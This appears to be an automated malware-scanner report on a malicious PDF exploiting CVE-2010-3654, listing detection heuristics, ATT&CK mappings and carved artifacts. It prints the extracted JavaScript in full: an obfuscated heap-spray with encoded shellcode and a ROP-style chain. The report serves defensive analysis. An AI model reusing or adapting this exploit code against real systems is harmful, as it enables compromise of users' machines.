MALICIOUS
340
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF document exploits CVE-2010-3654 using an embedded Flash object, which is a critical finding. The embedded JavaScript stream, when decoded, contains obfuscated code that likely downloads and executes a second-stage payload. The ClamAV detection of 'Win.Trojan.Agent-36159' further supports the malicious nature of the file.
Machine Learning
- Nyx PDF Classifier malicious score 0.9933
Heuristics 10
-
Adobe Reader authplay SWF exploit in PDF — CVE-2010-3654 critical CVE likely CVE_2010_3654_FLASH_RICHMEDIAPDF combines RichMedia Flash activation, an ActionScript 3 SWF containing DoABC/SymbolClass code with URLRequest or StagePlayer/ByteArray/loadBytes markers, and PDF-side shellcode heap-spray staging. This is the static delivery shape associated with CVE-2010-3654 Adobe Reader/Acrobat authplay Flash handling.
-
ClamAV: Win.Trojan.Agent-36159 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Agent-36159
-
Secondary embedded PDF body has suspicious static findings critical POLYGLOT_CHILD_PDF_STATIC_TRIAGEA valid PDF body was found at a nonzero offset inside another container and its carved contents matched PDF exploit or lure heuristics. This catches polyglots where the top-level magic routes to ZIP/OLE while a PDF reader or downstream parser opens the hidden PDF payload.
-
RichMedia (Flash) high PDF_RICHMEDIAPDF contains /RichMedia (Adobe Flash) which is a historic exploit vector (matched inside decoded stream)
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules. (matched inside decoded stream)
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload (matched inside decoded stream)
-
Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTALThe same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
Extracted artifacts 5
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj-001_000.js |
pdf-javascript-stream | PDF /JS object -1 at offset 0x397 | 2609 bytes |
SHA-256: fe5943f0dbcb4379c79afc5c8161656bc49581896c76fef406e83fa4e409a44a |
|||
|
Detection
ClamAV:
Win.Trojan.Agent-36159
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var ss;//ahlfah
for(i=0;i<18000;i++)
ss = ss+0x70;
function rep(str)
{
var sc='';
for(var i=2;i<str["\x6c\x65\x6e\x67\x74\x68"];i+=6)
sc+="\x25\x75"+str["\x73\x75\x62\x73\x74\x72"](i,4);
return sc;
}
var une = unescape;
var sc = "48c8d94874d948f42448e0ba48dcde4829d9485fc9483ab148573148831448220f48213e48640948d9dc4867e048d9d848dee048ea8348ba2048ec5748ded048d9dc48a86b4852d048c29648b7574855e848f98a48e86b489be448abf848882f48ab6b4852e048f09448daa448881548af5748ddc048ea2948972948749d481be34802ef4860ef48e1cc48aa124818d448d32b4803df4835a048e22d48abff48873b48806b48daf848b83d48d5574855ab48c5824803e348dd5748dd6b487219483cb948ea60485d3b48dd1f48de8a48268f4822b748dee7482d9548865548471c488b8e48a91f4826d8482297488e234847184899b648de8848d9cc4821e048d1ab4821b2482d8b48996948b3244853e0482d9b4821b048d1ab48a91f482624482297488e2348551048d59348996b481924485ee848e95c489e03482e3e48891f4831244821a148262348bbf648c9264814b448487348d64c48af0648454d4806a1483fd648d9de48e3d548d9dd4852f448d9dd48ddfc48d9dc";
sc = une(rep(sc));
var p = unescape;
var len = "\x6c\x65\x6e\x67\x74\x68";
var s2 = "\x73\x75\x62\x73\x74\x72\x69\x6e\x67";
var s3 = "\x73\x75\x62\x73\x74\x72";
function a(__){var _='';for(var ___=0;___<__[len];___+=4) _+='%'+'u'+__[s3](___,4);return _;}
function s()
{
c=p(a("58585858"));
while(c[len] + 20 + 8 < 0x10000) c = c + c;
b = c[s2](0,(0x5858-0x24)/2);
b += p(a("585858582fe10700deadbeefb00bface5868585849190700cccccccc48ef0700156f0700cccccccc90840700908407009084070090840700908407009084070090330700908407000c0c0c0c9084070090840700908407009084070090840700908407009084070090840700159907000124000172f707000104000115bb070010000000154d070015bb070003007ffe7fb2070015bb070000110001a8ac070015bb070001000001a8ac070072f707000011000152e207005c540700ffffffff0100000100000000010400011000000000400000d731070015bb0700905a9054154d0700a722070015bb0700eb5a5815154d0700a722070015bb07001a8b1889154d0700a722070015bb0700c0838304154d0700a722070015bb070004c2fb81154d0700a722070015bb070058585858154d0700a722070015bb0700ee7505eb154d0700a722070015bb0700e6e8ffff154d0700a722070015bb070090ff9090154d0700a722070015bb070090909090154d0700a722070015bb070090909090154d0700a722070015bb0700ffff90ff154d0700d7310700112f0700"));
b += sc;
b += c;
d = b[s2](0,0x10000/2);
e = c[s2](0,0x8000-(0x1020-0x08)/2);
while(d[len] < 0x80000) d+=d;
_3 = d[s2](0,0x80000-(0x1020-0x08)/2);
_4= new Array();
_5 = new Array();
for(i=0;i<0x300;i=i+1)
for(j=0;j<16;j++)
_5[i*16+j]=e+"y";
for(i=0;i<0x300;i=i+1)
for(j=0;j<15;j++)
_5[i*16+j]=null;
for(i=0;i<0x1E0;i=i+1) _4[i] =_3 + "s";
}
s();
|
|||
objstm_0027_00.bin |
pdf-objstm-decoded | PDF /ObjStm 27 0 obj (inflated) | 1170 bytes |
SHA-256: 667b2c75ccf7ac530ab7ab1335ed88701c878c9bd33ce7626a853b18be32e7d1 |
|||
font_00_sfnt_off00021a56.bin |
pdf-font-stream | PDF embedded font (sfnt) at offset 0x21A56 | 203108 bytes |
SHA-256: 705655d5c76fbfc3c3df1f34447505d8348355dc80b0f07069bd2093ec27ca7b |
|||
polyglot_child_pdf_off00020a61.pdf |
polyglot-child-pdf | Secondary PDF body inside pdf container at offset 0x20A61 | 54997 bytes |
SHA-256: f8f3194608695c2b8b5579cd05d929f2d60de486f336026ddcf543fc0ac069a0 |
|||
polyglot_child_pdf_off0002c949.pdf |
polyglot-child-pdf | Secondary PDF body inside pdf container at offset 0x2C949 | 6125 bytes |
SHA-256: 0b1c923c8a0028794f3a3244dc498786746334f394e41678cc58ffbeb707d0a8 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.